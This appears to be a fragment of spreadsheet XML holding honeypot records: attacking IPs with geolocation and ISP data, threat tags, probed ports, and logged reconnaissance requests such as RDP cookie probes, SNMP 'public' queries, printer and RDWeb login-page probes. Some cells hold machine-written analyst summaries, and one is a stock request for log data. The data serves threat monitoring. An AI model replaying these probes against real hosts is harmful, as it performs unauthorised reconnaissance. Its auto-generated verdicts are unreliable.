    <t>NA&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Connection': 'close', 'Host': '154.93.37.45', 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Connection': 'close', 'Host': '193.57.138.110', 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Connection': 'close', 'Host': '5.180.55.39', 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Connection': 'close', 'Host': '38.54.42.176', 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Connection': 'close', 'Host': '94.131.97.67', 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Connection': 'close', 'Host': '38.54.115.66', 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Connection': 'close', 'Host': '94.131.113.33', 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Connection': 'close', 'Host': '95.164.21.98', 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Connection': 'close', 'Host': '66.94.127.183', 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Connection': 'close', 'Host': '154.90.63.129', 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Connection': 'close', 'Host': '38.54.115.66', 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:33fe:3160</t>
  </si>
  <si>
    <t>d72b6ea5ed96ae48dee8dbedf36d3bc3</t>
  </si>
  <si>
    <t>59.178.15.124</t>
  </si>
  <si>
    <t>::ffff:3bb2:f7c</t>
  </si>
  <si>
    <t>7b61a289ed13734695df80e81f2ff251</t>
  </si>
  <si>
    <t>117.223.94.76</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>BB-Multiplay-Business</t>
  </si>
  <si>
    <t>::ffff:75df:5e4c</t>
  </si>
  <si>
    <t>c8275eca20436cfc3a3fe52f7585f672</t>
  </si>
  <si>
    <t>198.235.24.186</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:ssh'&amp;&amp; 'attack-target:sip']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_IMAP_H32&amp;&amp;SMA-LAB_SNMP_H25&amp;&amp;SMA-LAB_MT-CPA_H13&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_IMAP_H11&amp;&amp;SMA-LAB_REDIS_H13&amp;&amp;SMA-LAB_SNMP_H26&amp;&amp;SMA-LAB_PJL_H6&amp;&amp;SMA-LAB_FTP_H17&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_REDIS_H15&amp;&amp;SMA-LAB_SNMP_H12&amp;&amp;SMA-LAB_SOCKS5_H22&amp;&amp;SMA-LAB_ORACLE_H46&amp;&amp;SMA-LAB_HTTPS_H34&amp;&amp;SMA-LAB_SNMP_H44&amp;&amp;SMA-LAB_FTP_H31&amp;&amp;SMA-LAB_REDIS_H6&amp;&amp;SMA-LAB_IMAP_H30&amp;&amp;SMA-LAB_ORACLE_H33&amp;&amp;SMA-LAB_POSTGRES_H45&amp;&amp;SMA-LAB_SNMP_H40&amp;&amp;SMA-LAB_IMAP_H8&amp;&amp;SMA-LAB_FTP_H14&amp;&amp;SMA-LAB_RDP_H24&amp;&amp;SMA-LAB_POSTGRES_H33&amp;&amp;SMA-LAB_POP3_H32&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_PJL_H14&amp;&amp;SMA-LAB_IMAP_HC1&amp;&amp;SMA-LAB_MSSQL_H33&amp;&amp;SMA-LAB_FTP_H27&amp;&amp;SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_NTP_H37&amp;&amp;SMA-LAB_ORACLE_H18&amp;&amp;SMA-LAB_LDAP_H13&amp;&amp;SMA-LAB_IMAP_H14&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_POSTGRES_H41&amp;&amp;SMA-LAB_ORACLE_H27&amp;&amp;SMA-LAB_SIP_H47&amp;&amp;SMA-LAB_POSTGRES_H22&amp;&amp;SMA-LAB_MYSQL_H22&amp;&amp;SMA-LAB_NTP_H2&amp;&amp;SMA-LAB_IMAP_H22&amp;&amp;SMA-LAB_IMAP_H36&amp;&amp;SMA-LAB_SNMP_H31&amp;&amp;SMA-LAB_IMAP_H34&amp;&amp;SMA-LAB_ORACLE_H7&amp;&amp;SMA-LAB_SOCKS5_H24&amp;&amp;SMA-LAB_FTP_H28&amp;&amp;SMA-LAB_LDAP_H24&amp;&amp;SMA-LAB_MYSQL_H35&amp;&amp;SMA-LAB_SOCKS5_H36&amp;&amp;SMA-LAB_MYSQL_H41&amp;&amp;SMA-LAB_IMAP_H18&amp;&amp;SMA-LAB_ORACLE_H5&amp;&amp;SMA-LAB_FTP_H10&amp;&amp;SMA-LAB_POP3_H6&amp;&amp;SMA-LAB_NTP_H28&amp;&amp;SMA-LAB_ORACLE_H34&amp;&amp;SMA-LAB_MYSQL_H16&amp;&amp;SMA-LAB_SOCKS5_H37&amp;&amp;SMA-LAB_MYSQL_H9&amp;&amp;SMA-LAB_LDAP_H14&amp;&amp;SMA-LAB_MT-CPA_H16&amp;&amp;SMA-LAB_IMAP_H5&amp;&amp;SMA-LAB_FTP_H9&amp;&amp;SMA-LAB_LDAP_H33&amp;&amp;SMA-LAB_FTP_H39&amp;&amp;SMA-LAB_POP3_H22&amp;&amp;SMA-LAB_PJL_H27&amp;&amp;SMA-LAB_POSTGRES_H30&amp;&amp;SMA-LAB_ORACLE_H36&amp;&amp;SMA-LAB_LDAP_H15</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;143&amp;&amp;161&amp;&amp;6341&amp;&amp;23&amp;&amp;6379&amp;&amp;9100&amp;&amp;21&amp;&amp;80&amp;&amp;1080&amp;&amp;1521&amp;&amp;443&amp;&amp;5432&amp;&amp;3389&amp;&amp;110&amp;&amp;1433&amp;&amp;50494&amp;&amp;NA&amp;&amp;53557&amp;&amp;3306&amp;&amp;56982&amp;&amp;389&amp;&amp;55993&amp;&amp;49569&amp;&amp;6667&amp;&amp;445&amp;&amp;5900&amp;&amp;57043&amp;&amp;63020&amp;&amp;53083&amp;&amp;50825&amp;&amp;49490&amp;&amp;63820&amp;&amp;56501</t>
  </si>
  <si>
    <t>connection&amp;&amp;stshash&amp;&amp;request&amp;&amp;NA&amp;&amp;query&amp;&amp;command</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=jgyIbIxEG'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=CNqrQd'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=WpfmBm'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.186,64404)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.186,64408)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.186,64410)}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=leChfxmZQ'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=tQGZId'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=jjJlWM'}}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.186,62838)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.186,62844)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.186,62850)}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=ByRbKMisq'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=CnFkBE'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=beLOxo'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=xprRmgzPe'}}</t>
  </si>
  <si>
    <t>::ffff:c6eb:18ba</t>
  </si>
  <si>
    <t>0630d0cd9a150ffd1115e456a7dda8b5</t>
  </si>
  <si>
    <t>59.182.133.81</t>
  </si>
  <si>
    <t>Malappuram</t>
  </si>
  <si>
    <t>Manjeri</t>
  </si>
  <si>
    <t>1263694</t>
  </si>
  <si>
    <t>11.1202</t>
  </si>
  <si>
    <t>76.12</t>
  </si>
  <si>
    <t>::ffff:3bb6:8551</t>
  </si>
  <si>
    <t>910a4368349f26868f534cee5df11312</t>
  </si>
  <si>
    <t>23.137.100.81</t>
  </si>
  <si>
    <t>Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Credential Stuffing&amp;&amp;Email Spoofing</t>
  </si>
  <si>
    <t>SMA-LAB_SMTP_HC1</t>
  </si>
  <si>
    <t>401616</t>
  </si>
  <si>
    <t>PRV8 Network LLC</t>
  </si>
  <si>
    <t>2025-04-10</t>
  </si>
  <si>
    <t>PNL</t>
  </si>
  <si>
    <t>{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'LOGIN', 'command': 'AUTH', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'QUIT', 'data': 'None'}}</t>
  </si>
  <si>
    <t>::ffff:1789:6451</t>
  </si>
  <si>
    <t>An unknown entity attempted to send an email by initiating a connection with the monitored server, but it was immediately disconnected after sending the QUIT command. The lack of any actual mail being sent and the abrupt disconnection suggests suspicious behavior. This could indicate reconnaissance or probing for potential vulnerabilities in the system. &amp;&amp; The user attempted to disconnect from an SMTP service, but the request was made without any actual mail being sent or received, which could be a probing or reconnaissance attempt. This action may indicate someone trying to identify if a specific service is running and accessible on the network. The lack of data suggests it might not be a legitimate disconnection attempt.</t>
  </si>
  <si>
    <t>8b1e2046c06fc363f7eb0d67c291747e</t>
  </si>
  <si>
    <t>111.118.114.135</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>Pohang-si</t>
  </si>
  <si>
    <t>Pohang-si (Jangseong-dong)</t>
  </si>
  <si>
    <t>1839068</t>
  </si>
  <si>
    <t>36.0784</t>
  </si>
  <si>
    <t>129.379</t>
  </si>
  <si>
    <t>7623</t>
  </si>
  <si>
    <t>Gyeongbuk Cable TV</t>
  </si>
  <si>
    <t>HYUNDAI COMMUNICATIONS &amp; NETWORK</t>
  </si>
  <si>
    <t>HYUNDAI HCN Kyongbuk Systems Co.Ltd</t>
  </si>
  <si>
    <t>::ffff:6f76:7287</t>
  </si>
  <si>
    <t>3cb24335dd015d1d9c28d60a9870930f</t>
  </si>
  <si>
    <t>114.33.56.1</t>
  </si>
  <si>
    <t>NA&amp;&amp;114-33-56-1.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H24</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;8112&amp;&amp;44088&amp;&amp;23&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:7221:3801</t>
  </si>
  <si>
    <t>41899308d10373d39593eb892cbefe22</t>
  </si>
  <si>
    <t>103.206.205.54</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_SNMP_H47&amp;&amp;SMA-LAB_MT-CPA_H29&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H14</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;161&amp;&amp;61754&amp;&amp;NA</t>
  </si>
  <si>
    <t>Watthana</t>
  </si>
  <si>
    <t>Vadhana</t>
  </si>
  <si>
    <t>7027003</t>
  </si>
  <si>
    <t>13.729800000000001</t>
  </si>
  <si>
    <t>100.585</t>
  </si>
  <si>
    <t>135034</t>
  </si>
  <si>
    <t>Planet Communications Asia Public Company Limited</t>
  </si>
  <si>
    <t>::ffff:67ce:cd36</t>
  </si>
  <si>
    <t>e6d6ebd9005e973470ce661ecf615d91</t>
  </si>
  <si>
    <t>45.33.33.230</t>
  </si>
  <si>
    <t>prod-boron-us-west-30.li.binaryedge.ninja&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_LDAP_H19&amp;&amp;SMA-LAB_SMB_H36&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_PJL_H22&amp;&amp;SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_REDIS_HC1&amp;&amp;SMA-LAB_FTP_H2&amp;&amp;SMA-LAB_MYSQL_H29&amp;&amp;SMA-LAB_REDIS_H36&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_RDP_H19&amp;&amp;SMA-LAB_SOCKS5_H28&amp;&amp;SMA-LAB_IMAP_H17</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;389&amp;&amp;445&amp;&amp;5900&amp;&amp;80&amp;&amp;9100&amp;&amp;64646&amp;&amp;6379&amp;&amp;21&amp;&amp;3306&amp;&amp;3389&amp;&amp;1080&amp;&amp;143&amp;&amp;631&amp;&amp;NA&amp;&amp;443</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '147', 'Content-Type': 'application/ipp', 'Host': '194.233.76.135:631', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://194.233.76.135:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '144.126.148.5:631', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://144.126.148.5:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '91.194.11.82', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.54.63.23:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.54.63.23:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36', 'method': 'GET', 'uri': '/RDWeb/Pages/en-US/login.aspx'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.54.63.23:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36', 'method': 'GET', 'uri': '/RDWeb'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.54.63.23:443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36', 'method': 'GET', 'uri': '/Remote'}}</t>
  </si>
  <si>
    <t>::ffff:2d21:21e6</t>
  </si>
  <si>
    <t>2c39e593341c54f0a6d2e743eda01266</t>
  </si>
  <si>
    <t>37.229.237.43</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H24</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;39737&amp;&amp;19488&amp;&amp;NA</t>
  </si>
  <si>
    <t>2012-04-10</t>
  </si>
  <si>
    <t>::ffff:25e5:ed2b</t>
  </si>
  <si>
    <t>386b4faadd0daaa3f6f1f8e15ddb9715</t>
  </si>
  <si>
    <t>117.123.245.85</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;abuseipdb&amp;&amp;SMA-LAB_TELNET_H36</t>
  </si>
  <si>
    <t>17849</t>
  </si>
  <si>
    <t>TBROAD Ginam</t>
  </si>
  <si>
    <t>2007-08-07</t>
  </si>
  <si>
    <t>::ffff:757b:f555</t>
  </si>
  <si>
    <t>8f94012051ba22d6f7433c8cbda2a8cc</t>
  </si>
  <si>
    <t>109.122.239.92</t>
  </si>
  <si>
    <t>SMA-LAB_SSH_H5&amp;&amp;SMA-LAB_MT-CPA_H2&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>22&amp;&amp;30128&amp;&amp;23</t>
  </si>
  <si>
    <t>51.4259</t>
  </si>
  <si>
    <t>::ffff:6d7a:ef5c</t>
  </si>
  <si>
    <t>26b1e04d1ac8c155e9c90b122967ebb4</t>
  </si>
  <si>
    <t>117.233.133.196</t>
  </si>
  <si>
    <t>::ffff:75e9:85c4</t>
  </si>
  <si>
    <t>e714ff28467f4eb4d8441c1caac36934</t>
  </si>
  <si>
    <t>117.233.235.193</t>
  </si>
  <si>
    <t>::ffff:75e9:ebc1</t>
  </si>
  <si>
    <t>08fd813f87220f370cd7c69bd20f6856</t>
  </si>
  <si>
    <t>58.186.32.164</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H31&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>33038&amp;&amp;1433&amp;&amp;3306</t>
  </si>
  <si>
    <t>::ffff:3aba:20a4</t>
  </si>
  <si>
    <t>c56c1bd978ecbe60154fecc01e26dbba</t>
  </si>
  <si>
    <t>202.88.233.159</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_MT-CPA_H15&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MYSQL_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;25047&amp;&amp;32106&amp;&amp;1433&amp;&amp;3306</t>
  </si>
  <si>
    <t>::ffff:ca58:e99f</t>
  </si>
  <si>
    <t>cb98b02aaa75c9fac07b90a1bf508fc7</t>
  </si>
  <si>
    <t>37.255.213.237</t>
  </si>
  <si>
    <t>32.6554</t>
  </si>
  <si>
    <t>51.6737</t>
  </si>
  <si>
    <t>Telecommunication Company of Esfahan</t>
  </si>
  <si>
    <t>::ffff:25ff:d5ed</t>
  </si>
  <si>
    <t>a64d4d946128cbbefd852b1a1894c2e6</t>
  </si>
  <si>
    <t>103.99.17.67</t>
  </si>
  <si>
    <t>SMA-LAB_SSH_H32&amp;&amp;SMA-LAB_MT-CPA_H45&amp;&amp;SMA-LAB_MT-CPA_H2&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H13</t>
  </si>
  <si>
    <t>22&amp;&amp;33888&amp;&amp;6631&amp;&amp;1433&amp;&amp;3306</t>
  </si>
  <si>
    <t>Bhubaneswar (Arya Vihar Colony)</t>
  </si>
  <si>
    <t>751009</t>
  </si>
  <si>
    <t>20.3315</t>
  </si>
  <si>
    <t>85.8145</t>
  </si>
  <si>
    <t>136376</t>
  </si>
  <si>
    <t>Udayatel Communications Private Limited</t>
  </si>
  <si>
    <t>::ffff:6763:1143</t>
  </si>
  <si>
    <t>ef5a9d7fd252783a1c875f50748692fd</t>
  </si>
  <si>
    <t>110.44.240.200</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H35&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H44</t>
  </si>
  <si>
    <t>37844&amp;&amp;23&amp;&amp;NA</t>
  </si>
  <si>
    <t>Dongnae-gu</t>
  </si>
  <si>
    <t>Dongnae (Jeonpo-daero)</t>
  </si>
  <si>
    <t>1834203</t>
  </si>
  <si>
    <t>35.1543</t>
  </si>
  <si>
    <t>129.065</t>
  </si>
  <si>
    <t>9845</t>
  </si>
  <si>
    <t>HVJungbusan</t>
  </si>
  <si>
    <t>::ffff:6e2c:f0c8</t>
  </si>
  <si>
    <t>The log data is empty, indicating there are currently no recorded malicious activities.</t>
  </si>
  <si>
    <t>I'll need some log data to analyze. Please provide the actual log data for me to work with.
Once you provide the log data, I can help you identify the type of attack and give a short phrase describing it (max 2 words).</t>
  </si>
  <si>
    <t>6bd76fff4229c317b5de72b4558d189f</t>
  </si>
  <si>
    <t>49.43.226.144</t>
  </si>
  <si>
    <t>Kukatpally</t>
  </si>
  <si>
    <t>1265767</t>
  </si>
  <si>
    <t>17.4849</t>
  </si>
  <si>
    <t>78.4138</t>
  </si>
  <si>
    <t>Rjil Internet</t>
  </si>
  <si>
    <t>2010-10-27</t>
  </si>
  <si>
    <t>::ffff:312b:e290</t>
  </si>
  <si>
    <t>681e9b97a803ccade3fb18ad2c35b0b3</t>
  </si>
  <si>
    <t>85.70.45.159</t>
  </si>
  <si>
    <t>85-70-45-159.rcd.o2.cz</t>
  </si>
  <si>
    <t>SMA-LAB_HTTPS_H27&amp;&amp;SMA-LAB_HTTPS_HC1</t>
  </si>
  <si>
    <t>Prague</t>
  </si>
  <si>
    <t>Praha 4</t>
  </si>
  <si>
    <t>Prague (Praha 4)</t>
  </si>
  <si>
    <t>3067696</t>
  </si>
  <si>
    <t>140 00</t>
  </si>
  <si>
    <t>50.0465</t>
  </si>
  <si>
    <t>14.4565</t>
  </si>
  <si>
    <t>5610</t>
  </si>
  <si>
    <t>O2 Czech Republic, a.s.</t>
  </si>
  <si>
    <t>CZ.CZNET</t>
  </si>
  <si>
    <t>2004-11-02</t>
  </si>
  <si>
    <t>{Data_HTTPS:{'Accept': 'text/plain,text/html', 'Host': '95.164.21.98', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}</t>
  </si>
  <si>
    <t>::ffff:5546:2d9f</t>
  </si>
  <si>
    <t>df2d4b99505b1992a4dafccac7467edb</t>
  </si>
  <si>
    <t>202.83.54.193</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H23&amp;&amp;SMA-LAB_MT-CPA_H7&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;8161&amp;&amp;1433&amp;&amp;445</t>
  </si>
  <si>
    <t>2004-03-15</t>
  </si>
  <si>
    <t>ASIANET</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (202.83.54.193,52213)}&amp;&amp;{Data_SMB:Incoming connection (202.83.54.193,60484)}&amp;&amp;{Data_SMB:Incoming connection (202.83.54.193,60871)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
